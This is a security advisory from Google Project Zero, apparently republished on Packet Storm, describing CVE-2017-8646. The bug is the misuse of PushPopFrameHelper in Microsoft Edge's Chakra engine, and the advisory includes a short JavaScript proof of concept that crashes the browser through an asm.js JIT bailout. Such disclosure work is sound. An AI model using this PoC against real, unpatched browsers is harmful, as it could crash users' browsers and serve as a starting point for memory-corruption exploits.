Microsoft Edge Chakra PushPopFrameHelper Incorrect Usage

2017-08-16T00:00:00
ID PACKETSTORM:143792
Type packetstorm
Reporter Google Security Research
Modified 2017-08-16T00:00:00

Description

                                        
                                            ` Microsoft Edge: Chakra: Incorrect usage of PushPopFrameHelper in InterpreterStackFrame::ProcessLinkFailedAsmJsModule   
  
CVE-2017-8646  
  
  
PushPopFrameHelper is a class that pushes the current stack frame object in its constructor and pops it in the destructor. So it should be used like "PushPopFrameHelper holder(...)", but InterpreterStackFrame::ProcessLinkFailedAsmJsModule uses it like a function.  
  
Var InterpreterStackFrame::ProcessLinkFailedAsmJsModule()  
{  
...  
PushPopFrameHelper(newInstance, _ReturnAddress(), _AddressOfReturnAddress());  
...  
}  
  
It pushes "newInstance" and immediately pop it.  
  
The PoC will crash in the following code.  
void BailOutRecord::ScheduleLoopBodyCodeGen(Js::ScriptFunction * function, Js::ScriptFunction * innerMostInlinee, BailOutRecord const * bailOutRecord, IR::BailOutKind bailOutKind)  
{  
...  
Js::InterpreterStackFrame * interpreterFrame = executeFunction->GetScriptContext()->GetThreadContext()->GetLeafInterpreterFrame(); <<-- Invalid stack frame object  
loopHeader = executeFunction->GetLoopHeader(interpreterFrame->GetCurrentLoopNum()); <<-- interpreterFrame->GetCurrentLoopNum() == -1  
...  
}  
  
  
PoC:  
function asmModule() {  
'use asm';  
  
let a = [1, 2, 3, 4];  
for (let i = 0; i < 0x100000; i++) { // JIT  
a[0] = 1;  
if (i === 0x30000) {  
a[0] = {}; // the array type changed, bailout!!  
}  
}  
  
function f(v) {  
v = v | 0;  
return v | 0;  
}  
return f;  
}  
  
asmModule(1);  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`